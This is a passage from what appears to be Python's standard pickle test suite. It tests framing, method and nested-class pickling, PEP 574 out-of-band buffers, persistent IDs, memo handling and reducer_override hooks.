for bytes_type in (bytes, bytearray):
obj = {i: bytes_type([i]) * frame_size for i in range(num_frames)}
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
pickled = self.dumps(obj, proto)
frameless_pickle = remove_frames(pickled)
self.assertEqual(count_opcode(pickle.FRAME, frameless_pickle), 0)
self.assertEqual(obj, self.loads(frameless_pickle))
some_frames_pickle = remove_frames(pickled, lambda i: i % 2)
self.assertLess(count_opcode(pickle.FRAME, some_frames_pickle),
count_opcode(pickle.FRAME, pickled))
self.assertEqual(obj, self.loads(some_frames_pickle))
@support.skip_if_pgo_task
def test_framed_write_sizes_with_delayed_writer(self):
class ChunkAccumulator:
"""Accumulate pickler output in a list of raw chunks."""
def __init__(self):
self.chunks = []
def write(self, chunk):
self.chunks.append(chunk)
def concatenate_chunks(self):
return b"".join(self.chunks)
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
objects = [(str(i).encode('ascii'), i % 42, {'i': str(i)})
for i in range(int(1e4))]
# Add a large unique ASCII string
objects.append('0123456789abcdef' *
(self.FRAME_SIZE_TARGET // 16 + 1))
# Protocol 4 packs groups of small objects into frames and issues
# calls to write only once or twice per frame:
# The C pickler issues one call to write per-frame (header and
# contents) while Python pickler issues two calls to write: one for
# the frame header and one for the frame binary contents.
writer = ChunkAccumulator()
self.pickler(writer, proto).dump(objects)
# Actually read the binary content of the chunks after the end
# of the call to dump: any memoryview passed to write should not
# be released otherwise this delayed access would not be possible.
pickled = writer.concatenate_chunks()
reconstructed = self.loads(pickled)
self.assertEqual(reconstructed, objects)
self.assertGreater(len(writer.chunks), 1)
# memoryviews should own the memory.
del objects
support.gc_collect()
self.assertEqual(writer.concatenate_chunks(), pickled)
n_frames = (len(pickled) - 1) // self.FRAME_SIZE_TARGET + 1
# There should be at least one call to write per frame
self.assertGreaterEqual(len(writer.chunks), n_frames)
# but not too many either: there can be one for the proto,
# one per-frame header, one per frame for the actual contents,
# and two for the header.
self.assertLessEqual(len(writer.chunks), 2 * n_frames + 3)
chunk_sizes = [len(c) for c in writer.chunks]
large_sizes = [s for s in chunk_sizes
if s >= self.FRAME_SIZE_TARGET]
medium_sizes = [s for s in chunk_sizes
if 9 < s < self.FRAME_SIZE_TARGET]
small_sizes = [s for s in chunk_sizes if s <= 9]
# Large chunks should not be too large:
for chunk_size in large_sizes:
self.assertLess(chunk_size, 2 * self.FRAME_SIZE_TARGET,
chunk_sizes)
# There shouldn't be too many small chunks: the protocol header,
# the frame headers and the large string headers are written
# in small chunks.
self.assertLessEqual(len(small_sizes),
len(large_sizes) + len(medium_sizes) + 3,
chunk_sizes)
def test_nested_names(self):
global Nested
class Nested:
class A:
class B:
class C:
pass
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for obj in [Nested.A, Nested.A.B, Nested.A.B.C]:
with self.subTest(proto=proto, obj=obj):
unpickled = self.loads(self.dumps(obj, proto))
self.assertIs(obj, unpickled)
def test_recursive_nested_names(self):
global Recursive
class Recursive:
pass
Recursive.mod = sys.modules[Recursive.__module__]
Recursive.__qualname__ = 'Recursive.mod.Recursive'
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
unpickled = self.loads(self.dumps(Recursive, proto))
self.assertIs(unpickled, Recursive)
del Recursive.mod # break reference loop
def test_py_methods(self):
global PyMethodsTest
class PyMethodsTest:
@staticmethod
def cheese():
return "cheese"
@classmethod
def wine(cls):
assert cls is PyMethodsTest
return "wine"
def biscuits(self):
assert isinstance(self, PyMethodsTest)
return "biscuits"
class Nested:
"Nested class"
@staticmethod
def ketchup():
return "ketchup"
@classmethod
def maple(cls):
assert cls is PyMethodsTest.Nested
return "maple"
def pie(self):
assert isinstance(self, PyMethodsTest.Nested)
return "pie"
py_methods = (
PyMethodsTest.cheese,
PyMethodsTest.wine,
PyMethodsTest().biscuits,
PyMethodsTest.Nested.ketchup,
PyMethodsTest.Nested.maple,
PyMethodsTest.Nested().pie
)
py_unbound_methods = (
(PyMethodsTest.biscuits, PyMethodsTest),
(PyMethodsTest.Nested.pie, PyMethodsTest.Nested)
)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for method in py_methods:
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(), unpickled())
for method, cls in py_unbound_methods:
obj = cls()
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(obj), unpickled(obj))
def test_c_methods(self):
global Subclass
class Subclass(tuple):
class Nested(str):
pass
c_methods = (
# bound built-in method
("abcd".index, ("c",)),
# unbound built-in method
(str.index, ("abcd", "c")),
# bound "slot" method
([1, 2, 3].__len__, ()),
# unbound "slot" method
(list.__len__, ([1, 2, 3],)),
# bound "coexist" method
({1, 2}.__contains__, (2,)),
# unbound "coexist" method
(set.__contains__, ({1, 2}, 2)),
# built-in class method
(dict.fromkeys, (("a", 1), ("b", 2))),
# built-in static method
(bytearray.maketrans, (b"abc", b"xyz")),
# subclass methods
(Subclass([1,2,2]).count, (2,)),
(Subclass.count, (Subclass([1,2,2]), 2)),
(Subclass.Nested("sweet").count, ("e",)),
(Subclass.Nested.count, (Subclass.Nested("sweet"), "e")),
)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for method, args in c_methods:
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(*args), unpickled(*args))
def test_compat_pickle(self):
tests = [
(range(1, 7), '__builtin__', 'xrange'),
(map(int, '123'), 'itertools', 'imap'),
(functools.reduce, '__builtin__', 'reduce'),
(dbm.whichdb, 'whichdb', 'whichdb'),
(Exception(), 'exceptions', 'Exception'),
(collections.UserDict(), 'UserDict', 'IterableUserDict'),
(collections.UserList(), 'UserList', 'UserList'),
(collections.defaultdict(), 'collections', 'defaultdict'),
]
for val, mod, name in tests:
for proto in range(3):
with self.subTest(type=type(val), proto=proto):
pickled = self.dumps(val, proto)
self.assertIn(('c%s\n%s' % (mod, name)).encode(), pickled)
self.assertIs(type(self.loads(pickled)), type(val))
def test_local_lookup_error(self):
# Test that whichmodule() errors out cleanly when the lookup of
# an assumed globally-reachable object fails.
def f():
pass
# Since the function is local, lookup will fail
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
# Same without a __module__ attribute (exercises a different path
# in _pickle.c).
del f.__module__
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
# Yet a different path.
f.__name__ = f.__qualname__
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
#
# PEP 574 tests below
#
def buffer_like_objects(self):
# Yield buffer-like objects with the bytestring "abcdefgh" in them
bytestring = b"abcdefgh"
yield ZeroCopyBytes(bytestring)
yield ZeroCopyBytearray(bytestring)
if _testbuffer is not None:
items = list(bytestring)
value = int.from_bytes(bytestring, byteorder='little')
for flags in (0, _testbuffer.ND_WRITABLE):
# 1-D, contiguous
yield PicklableNDArray(items, format='B', shape=(8,),
flags=flags)
# 2-D, C-contiguous
yield PicklableNDArray(items, format='B', shape=(4, 2),
strides=(2, 1), flags=flags)
# 2-D, Fortran-contiguous
yield PicklableNDArray(items, format='B',
shape=(4, 2), strides=(1, 4),
flags=flags)
def test_in_band_buffers(self):
# Test in-band buffers (PEP 574)
for obj in self.buffer_like_objects():
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(obj, proto)
if obj.c_contiguous and proto >= 5:
# The raw memory bytes are serialized in physical order
self.assertIn(b"abcdefgh", data)
self.assertEqual(count_opcode(pickle.NEXT_BUFFER, data), 0)
if proto >= 5:
self.assertEqual(count_opcode(pickle.SHORT_BINBYTES, data),
1 if obj.readonly else 0)
self.assertEqual(count_opcode(pickle.BYTEARRAY8, data),
0 if obj.readonly else 1)
# Returning a true value from buffer_callback should have
# the same effect
def buffer_callback(obj):
return True
data2 = self.dumps(obj, proto,
buffer_callback=buffer_callback)
self.assertEqual(data2, data)
new = self.loads(data)
# It's a copy
self.assertIsNot(new, obj)
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
# XXX Unfortunately cannot test non-contiguous array
# (see comment in PicklableNDArray.__reduce_ex__)
def test_oob_buffers(self):
# Test out-of-band buffers (PEP 574)
for obj in self.buffer_like_objects():
for proto in range(0, 5):
# Need protocol >= 5 for buffer_callback
with self.assertRaises(ValueError):
self.dumps(obj, proto,
buffer_callback=[].append)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = lambda pb: buffers.append(pb.raw())
data = self.dumps(obj, proto,
buffer_callback=buffer_callback)
self.assertNotIn(b"abcdefgh", data)
self.assertEqual(count_opcode(pickle.SHORT_BINBYTES, data), 0)
self.assertEqual(count_opcode(pickle.BYTEARRAY8, data), 0)
self.assertEqual(count_opcode(pickle.NEXT_BUFFER, data), 1)
self.assertEqual(count_opcode(pickle.READONLY_BUFFER, data),
1 if obj.readonly else 0)
if obj.c_contiguous:
self.assertEqual(bytes(buffers[0]), b"abcdefgh")
# Need buffers argument to unpickle properly
with self.assertRaises(pickle.UnpicklingError):
self.loads(data)
new = self.loads(data, buffers=buffers)
if obj.zero_copy_reconstruct:
# Zero-copy achieved
self.assertIs(new, obj)
else:
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
# Non-sequence buffers accepted too
new = self.loads(data, buffers=iter(buffers))
if obj.zero_copy_reconstruct:
# Zero-copy achieved
self.assertIs(new, obj)
else:
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
def test_oob_buffers_writable_to_readonly(self):
# Test reconstructing readonly object from writable buffer
obj = ZeroCopyBytes(b"foobar")
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = self.dumps(obj, proto, buffer_callback=buffer_callback)
buffers = map(bytearray, buffers)
new = self.loads(data, buffers=buffers)
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
def test_picklebuffer_error(self):
# PickleBuffer forbidden with protocol < 5
pb = pickle.PickleBuffer(b"foobar")
for proto in range(0, 5):
with self.assertRaises(pickle.PickleError):
self.dumps(pb, proto)
def test_buffer_callback_error(self):
def buffer_callback(buffers):
1/0
pb = pickle.PickleBuffer(b"foobar")
with self.assertRaises(ZeroDivisionError):
self.dumps(pb, 5, buffer_callback=buffer_callback)
def test_buffers_error(self):
pb = pickle.PickleBuffer(b"foobar")
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(pb, proto, buffer_callback=[].append)
# Non-iterable buffers
with self.assertRaises(TypeError):
self.loads(data, buffers=object())
# Buffer iterable exhausts too early
with self.assertRaises(pickle.UnpicklingError):
self.loads(data, buffers=[])
def test_inband_accept_default_buffers_argument(self):
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
data_pickled = self.dumps(1, proto, buffer_callback=None)
data = self.loads(data_pickled, buffers=None)
@unittest.skipIf(np is None, "Test needs Numpy")
def test_buffers_numpy(self):
def check_no_copy(x, y):
np.testing.assert_equal(x, y)
self.assertEqual(x.ctypes.data, y.ctypes.data)
def check_copy(x, y):
np.testing.assert_equal(x, y)
self.assertNotEqual(x.ctypes.data, y.ctypes.data)
def check_array(arr):
# In-band
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(arr, proto)
new = self.loads(data)
check_copy(arr, new)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffer_callback = lambda _: True
data = self.dumps(arr, proto, buffer_callback=buffer_callback)
new = self.loads(data)
check_copy(arr, new)
# Out-of-band
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = self.dumps(arr, proto, buffer_callback=buffer_callback)
new = self.loads(data, buffers=buffers)
if arr.flags.c_contiguous or arr.flags.f_contiguous:
check_no_copy(arr, new)
else:
check_copy(arr, new)
# 1-D
arr = np.arange(6)
check_array(arr)
# 1-D, non-contiguous
check_array(arr[::2])
# 2-D, C-contiguous
arr = np.arange(12).reshape((3, 4))
check_array(arr)
# 2-D, F-contiguous
check_array(arr.T)
# 2-D, non-contiguous
check_array(arr[::2])
class BigmemPickleTests(unittest.TestCase):
# Binary protocols can serialize longs of up to 2 GiB-1
@bigmemtest(size=_2G, memuse=3.6, dry_run=False)
def test_huge_long_32b(self, size):
data = 1 << (8 * size)
try:
for proto in protocols:
if proto < 2:
continue
with self.subTest(proto=proto):
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
finally:
data = None
# Protocol 3 can serialize up to 4 GiB-1 as a bytes object
# (older protocols don't have a dedicated opcode for bytes and are
# too inefficient)
@bigmemtest(size=_2G, memuse=2.5, dry_run=False)
def test_huge_bytes_32b(self, size):
data = b"abcd" * (size // 4)
try:
for proto in protocols:
if proto < 3:
continue
with self.subTest(proto=proto):
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINBYTES +
struct.pack("<I", len(data)))
data_start = pickled.index(data)
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
finally:
pickled = None
finally:
data = None
@bigmemtest(size=_4G, memuse=2.5, dry_run=False)
def test_huge_bytes_64b(self, size):
data = b"acbd" * (size // 4)
try:
for proto in protocols:
if proto < 3:
continue
with self.subTest(proto=proto):
if proto == 3:
# Protocol 3 does not support large bytes objects.
# Verify that we do not crash when processing one.
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
continue
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINBYTES8 +
struct.pack("<Q", len(data)))
data_start = pickled.index(data)
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
finally:
pickled = None
finally:
data = None
# All protocols use 1 byte per printable ASCII character; we add another
# byte because the encoded form has to be copied into the internal buffer.
@bigmemtest(size=_2G, memuse=8, dry_run=False)
def test_huge_str_32b(self, size):
data = "abcd" * (size // 4)
try:
for proto in protocols:
if proto == 0:
continue
with self.subTest(proto=proto):
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINUNICODE +
struct.pack("<I", len(data)))
data_start = pickled.index(b'abcd')
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
self.assertEqual((pickled.rindex(b"abcd") + len(b"abcd") -
pickled.index(b"abcd")), len(data))
finally:
pickled = None
finally:
data = None
# BINUNICODE (protocols 1, 2 and 3) cannot carry more than 2**32 - 1 bytes
# of utf-8 encoded unicode. BINUNICODE8 (protocol 4) supports these huge
# unicode strings however.
@bigmemtest(size=_4G, memuse=8, dry_run=False)
def test_huge_str_64b(self, size):
data = "abcd" * (size // 4)
try:
for proto in protocols:
if proto == 0:
continue
with self.subTest(proto=proto):
if proto < 4:
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
continue
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINUNICODE8 +
struct.pack("<Q", len(data)))
data_start = pickled.index(b'abcd')
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
self.assertEqual((pickled.rindex(b"abcd") + len(b"abcd") -
pickled.index(b"abcd")), len(data))
finally:
pickled = None
finally:
data = None
# Test classes for reduce_ex
class REX_one(object):
"""No __reduce_ex__ here, but inheriting it from object"""
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return REX_one, ()
class REX_two(object):
"""No __reduce__ here, but inheriting it from object"""
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
class REX_three(object):
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
def __reduce__(self):
raise TestFailed("This __reduce__ shouldn't be called")
class REX_four(object):
"""Calling base class method should succeed"""
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return object.__reduce_ex__(self, proto)
class REX_five(object):
"""This one used to fail with infinite recursion"""
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return object.__reduce__(self)
class REX_six(object):
"""This class is used to check the 4th argument (list iterator) of
the reduce protocol.
"""
def __init__(self, items=None):
self.items = items if items is not None else []
def __eq__(self, other):
return type(self) is type(other) and self.items == other.items
def append(self, item):
self.items.append(item)
def __reduce__(self):
return type(self), (), None, iter(self.items), None
class REX_seven(object):
"""This class is used to check the 5th argument (dict iterator) of
the reduce protocol.
"""
def __init__(self, table=None):
self.table = table if table is not None else {}
def __eq__(self, other):
return type(self) is type(other) and self.table == other.table
def __setitem__(self, key, value):
self.table[key] = value
def __reduce__(self):
return type(self), (), None, None, iter(self.table.items())
class REX_state(object):
"""This class is used to check the 3th argument (state) of
the reduce protocol.
"""
def __init__(self, state=None):
self.state = state
def __eq__(self, other):
return type(self) is type(other) and self.state == other.state
def __setstate__(self, state):
self.state = state
def __reduce__(self):
return type(self), (), self.state
# Test classes for newobj
class MyInt(int):
sample = 1
class MyFloat(float):
sample = 1.0
class MyComplex(complex):
sample = 1.0 + 0.0j
class MyStr(str):
sample = "hello"
class MyUnicode(str):
sample = "hello \u1234"
class MyTuple(tuple):
sample = (1, 2, 3)
class MyList(list):
sample = [1, 2, 3]
class MyDict(dict):
sample = {"a": 1, "b": 2}
class MySet(set):
sample = {"a", "b"}
class MyFrozenSet(frozenset):
sample = frozenset({"a", "b"})
myclasses = [MyInt, MyFloat,
MyComplex,
MyStr, MyUnicode,
MyTuple, MyList, MyDict, MySet, MyFrozenSet]
class MyIntWithNew(int):
def __new__(cls, value):
raise AssertionError
class MyIntWithNew2(MyIntWithNew):
__new__ = int.__new__
class SlotList(MyList):
__slots__ = ["foo"]
class SimpleNewObj(int):
def __init__(self, *args, **kwargs):
# raise an error, to make sure this isn't called
raise TypeError("SimpleNewObj.__init__() didn't expect to get called")
def __eq__(self, other):
return int(self) == int(other) and self.__dict__ == other.__dict__
class ComplexNewObj(SimpleNewObj):
def __getnewargs__(self):
return ('%X' % self, 16)
class ComplexNewObjEx(SimpleNewObj):
def __getnewargs_ex__(self):
return ('%X' % self,), {'base': 16}
class BadGetattr:
def __getattr__(self, key):
self.foo
class AbstractPickleModuleTests(unittest.TestCase):
def test_dump_closed_file(self):
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, self.dump, 123, f)
finally:
support.unlink(TESTFN)
def test_load_closed_file(self):
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, self.load, f)
finally:
support.unlink(TESTFN)
def test_load_from_and_dump_to_file(self):
stream = io.BytesIO()
data = [123, {}, 124]
self.dump(data, stream)
stream.seek(0)
unpickled = self.load(stream)
self.assertEqual(unpickled, data)
def test_highest_protocol(self):
# Of course this needs to be changed when HIGHEST_PROTOCOL changes.
self.assertEqual(pickle.HIGHEST_PROTOCOL, 5)
def test_callapi(self):
f = io.BytesIO()
# With and without keyword arguments
self.dump(123, f, -1)
self.dump(123, file=f, protocol=-1)
self.dumps(123, -1)
self.dumps(123, protocol=-1)
self.Pickler(f, -1)
self.Pickler(f, protocol=-1)
def test_dump_text_file(self):
f = open(TESTFN, "w")
try:
for proto in protocols:
self.assertRaises(TypeError, self.dump, 123, f, proto)
finally:
f.close()
support.unlink(TESTFN)
def test_incomplete_input(self):
s = io.BytesIO(b"X''.")
self.assertRaises((EOFError, struct.error, pickle.UnpicklingError), self.load, s)
def test_bad_init(self):
# Test issue3664 (pickle can segfault from a badly initialized Pickler).
# Override initialization without calling __init__() of the superclass.
class BadPickler(self.Pickler):
def __init__(self): pass
class BadUnpickler(self.Unpickler):
def __init__(self): pass
self.assertRaises(pickle.PicklingError, BadPickler().dump, 0)
self.assertRaises(pickle.UnpicklingError, BadUnpickler().load)
def check_dumps_loads_oob_buffers(self, dumps, loads):
# No need to do the full gamut of tests here, just enough to
# check that dumps() and loads() redirect their arguments
# to the underlying Pickler and Unpickler, respectively.
obj = ZeroCopyBytes(b"foo")
for proto in range(0, 5):
# Need protocol >= 5 for buffer_callback
with self.assertRaises(ValueError):
dumps(obj, protocol=proto,
buffer_callback=[].append)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = dumps(obj, protocol=proto,
buffer_callback=buffer_callback)
self.assertNotIn(b"foo", data)
self.assertEqual(bytes(buffers[0]), b"foo")
# Need buffers argument to unpickle properly
with self.assertRaises(pickle.UnpicklingError):
loads(data)
new = loads(data, buffers=buffers)
self.assertIs(new, obj)
def test_dumps_loads_oob_buffers(self):
# Test out-of-band buffers (PEP 574) with top-level dumps() and loads()
self.check_dumps_loads_oob_buffers(self.dumps, self.loads)
def test_dump_load_oob_buffers(self):
# Test out-of-band buffers (PEP 574) with top-level dump() and load()
def dumps(obj, **kwargs):
f = io.BytesIO()
self.dump(obj, f, **kwargs)
return f.getvalue()
def loads(data, **kwargs):
f = io.BytesIO(data)
return self.load(f, **kwargs)
self.check_dumps_loads_oob_buffers(dumps, loads)
class AbstractPersistentPicklerTests(unittest.TestCase):
# This class defines persistent_id() and persistent_load()
# functions that should be used by the pickler. All even integers
# are pickled using persistent ids.
def persistent_id(self, object):
if isinstance(object, int) and object % 2 == 0:
self.id_count += 1
return str(object)
elif object == "test_false_value":
self.false_count += 1
return ""
else:
return None
def persistent_load(self, oid):
if not oid:
self.load_false_count += 1
return "test_false_value"
else:
self.load_count += 1
object = int(oid)
assert object % 2 == 0
return object
def test_persistence(self):
L = list(range(10)) + ["test_false_value"]
for proto in protocols:
self.id_count = 0
self.false_count = 0
self.load_false_count = 0
self.load_count = 0
self.assertEqual(self.loads(self.dumps(L, proto)), L)
self.assertEqual(self.id_count, 5)
self.assertEqual(self.false_count, 1)
self.assertEqual(self.load_count, 5)
self.assertEqual(self.load_false_count, 1)
class AbstractIdentityPersistentPicklerTests(unittest.TestCase):
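# Persistent IDs are the objects themselves here, so these tests check that
# values round-trip through the persistent-ID machinery with their types intact.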
def persistent_id(self, obj):
return obj
def persistent_load(self, pid):
return pid
def _check_return_correct_type(self, obj, proto):
unpickled = self.loads(self.dumps(obj, proto))
self.assertIsInstance(unpickled, type(obj))
self.assertEqual(unpickled, obj)
def test_return_correct_type(self):
for proto in protocols:
# Protocol 0 supports only ASCII strings.
if proto == 0:
self._check_return_correct_type("abc", 0)
else:
for obj in [b"abc\n", "abc\n", -1, -1.1 * 0.1, str]:
self._check_return_correct_type(obj, proto)
def test_protocol0_is_ascii_only(self):
non_ascii_str = "\N{EMPTY SET}"
self.assertRaises(pickle.PicklingError, self.dumps, non_ascii_str, 0)
pickled = pickle.PERSID + non_ascii_str.encode('utf-8') + b'\n.'
self.assertRaises(pickle.UnpicklingError, self.loads, pickled)
class AbstractPicklerUnpicklerObjectTests(unittest.TestCase):
pickler_class = None
unpickler_class = None
def setUp(self):
assert self.pickler_class
assert self.unpickler_class
def test_clear_pickler_memo(self):
# To test whether clear_memo() has any effect, we pickle an object,
# then pickle it again without clearing the memo; the two serialized
# forms should be different. If we clear_memo() and then pickle the
# object again, the third serialized form should be identical to the
# first one we obtained.
data = ["abcdefg", "abcdefg", 44]
for proto in protocols:
f = io.BytesIO()
pickler = self.pickler_class(f, proto)
pickler.dump(data)
first_pickled = f.getvalue()
# Reset BytesIO object.
f.seek(0)
f.truncate()
pickler.dump(data)
second_pickled = f.getvalue()
# Reset the Pickler and BytesIO objects.
pickler.clear_memo()
f.seek(0)
f.truncate()
pickler.dump(data)
third_pickled = f.getvalue()
self.assertNotEqual(first_pickled, second_pickled)
self.assertEqual(first_pickled, third_pickled)
def test_priming_pickler_memo(self):
# Verify that we can set the Pickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
self.assertNotEqual(first_pickled, primed_pickled)
def test_priming_unpickler_memo(self):
# Verify that we can set the Unpickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
unpickler = self.unpickler_class(io.BytesIO(first_pickled))
unpickled_data1 = unpickler.load()
self.assertEqual(unpickled_data1, data)
primed = self.unpickler_class(io.BytesIO(primed_pickled))
primed.memo = unpickler.memo
unpickled_data2 = primed.load()
primed.memo.clear()
self.assertEqual(unpickled_data2, data)
self.assertTrue(unpickled_data2 is unpickled_data1)
def test_reusing_unpickler_objects(self):
data1 = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data1)
pickled1 = f.getvalue()
data2 = ["abcdefg", 44, 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data2)
pickled2 = f.getvalue()
f = io.BytesIO()
f.write(pickled1)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data1)
f.seek(0)
f.truncate()
f.write(pickled2)
f.seek(0)
self.assertEqual(unpickler.load(), data2)
def _check_multiple_unpicklings(self, ioclass, *, seekable=True):
for proto in protocols:
with self.subTest(proto=proto):
data1 = [(x, str(x)) for x in range(2000)] + [b"abcde", len]
f = ioclass()
pickler = self.pickler_class(f, protocol=proto)
pickler.dump(data1)
pickled = f.getvalue()
N = 5
f = ioclass(pickled * N)
unpickler = self.unpickler_class(f)
for i in range(N):
if seekable:
pos = f.tell()
self.assertEqual(unpickler.load(), data1)
if seekable:
self.assertEqual(f.tell(), pos + len(pickled))
self.assertRaises(EOFError, unpickler.load)
def test_multiple_unpicklings_seekable(self):
self._check_multiple_unpicklings(io.BytesIO)
def test_multiple_unpicklings_unseekable(self):
self._check_multiple_unpicklings(UnseekableIO, seekable=False)
def test_multiple_unpicklings_minimal(self):
# File-like object that doesn't support peek() and readinto()
# (bpo-39681)
self._check_multiple_unpicklings(MinimalIO, seekable=False)
def test_unpickling_buffering_readline(self):
# Issue #12687: the unpickler's buffering logic could fail with
# text mode opcodes.
data = list(range(10))
for proto in protocols:
for buf_size in range(1, 11):
f = io.BufferedRandom(io.BytesIO(), buffer_size=buf_size)
pickler = self.pickler_class(f, protocol=proto)
pickler.dump(data)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data)
# Tests for dispatch_table attribute
REDUCE_A = 'reduce_A'
class AAA(object):
def __reduce__(self):
return str, (REDUCE_A,)
class BBB(object):
def __init__(self):
# Add an instance attribute to enable state-saving routines at pickling
# time.
self.a = "some attribute"
def __setstate__(self, state):
self.a = "BBB.__setstate__"
def setstate_bbb(obj, state):
"""Custom state setter for BBB objects
Such a callable may be created by people other than the authors of the
BBB class. If passed as the state_setter item of a custom reducer, it
allows for custom state-setting behavior of BBB objects. One can think of
it as the analogue of list_setitems or dict_setitems, but for foreign
classes/functions.
"""
obj.a = "custom state_setter"
class AbstractCustomPicklerClass:
"""Pickler implementing a reducing hook using reducer_override."""
def reducer_override(self, obj):
obj_name = getattr(obj, "__name__", None)
if obj_name == 'f':
# asking the pickler to save f as 5
return int, (5, )
if obj_name == 'MyClass':
return str, ('some str',)
elif obj_name == 'g':
# in this case the callback returns an invalid result (not a 2-5
# tuple or a string), so the pickler should raise a proper error.
return False
elif obj_name == 'h':
# Simulate a case when the reducer fails. The error should
# be propagated to the original ``dump`` call.
raise ValueError('The reducer just failed')
return NotImplemented
class AbstractHookTests(unittest.TestCase):
def test_pickler_hook(self):
# test the ability of a custom, user-defined CPickler subclass to
# override the default reducing routines of any type using the method
# reducer_override
def f():
pass
def g():
pass
def h():
pass
class MyClass:
pass
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
bio = io.BytesIO()
p = self.pickler_class(bio, proto)
p.dump([f, MyClass, math.log])
new_f, some_str, math_log = pickle.loads(bio.getvalue())
self.assertEqual(new_f, 5)
self.assertEqual(some_str, 'some str')
# math.log does not have its usual reducer overridden, so the
# custom reduction callback should silently direct the pickler
# to the default pickling by attribute, by returning
# NotImplemented
self.assertIs(math_log, math.log)
with self.assertRaises(pickle.PicklingError):
p.dump(g)
with self.assertRaisesRegex(
ValueError, 'The reducer just failed'):
p.dump(h)
@support.cpython_only
def test_reducer_override_no_reference_cycle(self):
# bpo-39492: reducer_override used to induce a spurious reference cycle
# inside the Pickler object, which could prevent all serialized objects
# from being garbage-collected without explicitly invoking gc.collect.
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
def f():
pass
wr = weakref.ref(f)
bio = io.BytesIO()
p = self.pickler_class(bio, proto)
p.dump(f)
new_f = pickle.loads(bio.getvalue())
assert new_f == 5
del p
del f
self.assertIsNone(wr())
class AbstractDispatchTableTests(unittest.TestCase):
def test_default_dispatch_table(self):
# No dispatch_table attribute by default
f = io.BytesIO()
p = self.pickler_class(f, 0)
with self.assertRaises(AttributeError):
p.dispatch_table
self.assertFalse(hasattr(p, 'dispatch_table'))
def test_class_dispatch_table(self):
# A dispatch_table attribute can be specified class-wide
dt = self.get_dispatch_table()
class MyPickler(self.pickler_class):
dispatch_table = dt
def dumps(obj, protocol=None):
f = io.BytesIO()
p = MyPickler(f, protocol)
self.assertEqual(p.dispatch_table, dt)
p.dump(obj)
return f.getvalue()
self._test_dispatch_table(dumps, dt)
def test_instance_dispatch_table(self):
# A dispatch_table attribute can also be specified instance-wide
dt = self.get_dispatch_table()
def dumps(obj, protocol=None):
f = io.BytesIO()
p = self.pickler_class(f, protocol)
p.dispatch_table = dt
self.assertEqual(p.dispatch_table, dt)
p.dump(obj)
return f.getvalue()
